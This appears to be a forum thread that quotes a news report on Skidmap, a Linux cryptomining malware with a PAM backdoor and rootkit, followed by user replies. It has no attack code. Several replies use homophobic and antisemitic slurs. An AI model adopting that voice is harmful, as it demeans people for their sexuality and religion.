>Skidmap uses fake statistics to hide its CPU usage
Cybersecurity researchers have identified a new strain of Linux malware that not only mines cryptocurrency illicitly, but provides the attackers with universal access to an infected system via a “secret master password.” TrendMicro’s latest blog also reveals that Skidmap attempts to mask its cryptocurrency mining by faking network traffic and CPU-related statistics. High CPU usage is considered the primary red flag of illicit cryptocurrency mining, which makes this functionality particularly dangerous.
Cryptocurrency mining malware is still a very real threat Initial infection occurs in a Linux process called crontab, a standard process that periodically schedules timed jobs in Unix-like systems. Skidmap then installs multiple malicious binaries, the first minimizing the infected machine’s security settings so that it can begin mining cryptocurrency unhindered.
“Besides the backdoor access, Skidmap also creates another way for its operators to gain access to the machine,” wrote TrendMicro. “The malware replaces the system’s pam_unix.so file (the module responsible for standard Unix authentication) with its own malicious version […].”
“[T]his malicious pam_unix.so file accepts a specific password for any users, thus allowing the attackers to log in as any user in the machine,” added the firm.
Additional binaries are dropped into the system to monitor the cryptocurrency miners as they work to generate digital money for the attackers. Skidmap checks which Linux OS is running before installing its crypto-miner. Unfortunately, TrendMicro didn’t indicate which cryptocurrency Skidmap illicitly mines. Hard Fork has reached out to the researchers for more information and will update this piece should they reply. The firm warned that Skidmap is more difficult to cure compared to other malware, particularly as it uses Linux Kernal Module (LKM) rootkits, which overwrite or modify parts of the OS kernel.
Skidmap is also reportedly programmed to reinfect systems that have been cleaned or restored. “Cryptocurrency-mining threats don’t just affect a server or workstation’s performance — they could also translate to higher expenses and even disrupt businesses especially if they are used to run mission-critical operations,” wrote TrendMicro.
To protect against Skidmap, TrendMicro urges admins to keep their systems and servers patched and updated, and beware of unverified, third-party repositories. They should also enforce the “principle of least privilege” to prevent malicious binaries from obtaining access to critical system processes in the the first place.
Update 10:38 UTC, September 17: A TrendMicro spokesperson has since contacted Hard Fork to confirm that Skidmap mines Monero, the private-focused altcoin.
“The cryptocurrency miner pertaining to this article is a variant of XMRig which mines Monero cryptocurrency,” they said via email.
XMRig is open-source cryptocurrency mining software available on GitHub.
>infected via cron audit your system from the fundamentals brainlet rhel and sle fags.
Henry Flores
Social engineering
Gavin Allen
>not compiling from source and auditing the code of every program you run lmao
Nolan Howard
I don't understand Bitcoin so this might be wrong but can't you mine send and receive Bitcoin without an internet connection?
Gavin Jenkins
yeah the fucking bitcoin fairy comes and takes your hashes to crypto heaven
Connor Murphy
No, you need to create blocks that agree with the rest of the network. If you aren't connected then your chain will be out of sync and your work will be useless
Matthew Ortiz
The security researches were British so it's pronounced "secret moster possword"
Logan Stewart
yeah right
Connor Kelly
What happens when you download infected compiler, faggot? Or you compile the compiler yourself?
Bentley Cruz
Fuck off jew, Everyone knows linux cant get viruses. MacFags BTFO'd once again
Dylan Allen
>not bootstrapping your compiler starting from assembly you manually wrote yourself user...
>installation via crontab What does this mean? It isn't news that processes in Linux are given the permissions of the user that runs them. "Linux doesn't get viruses" is a meme, and it doesn't mean "it is impossible for an executable to compromise/damage a Linux system" anyway.
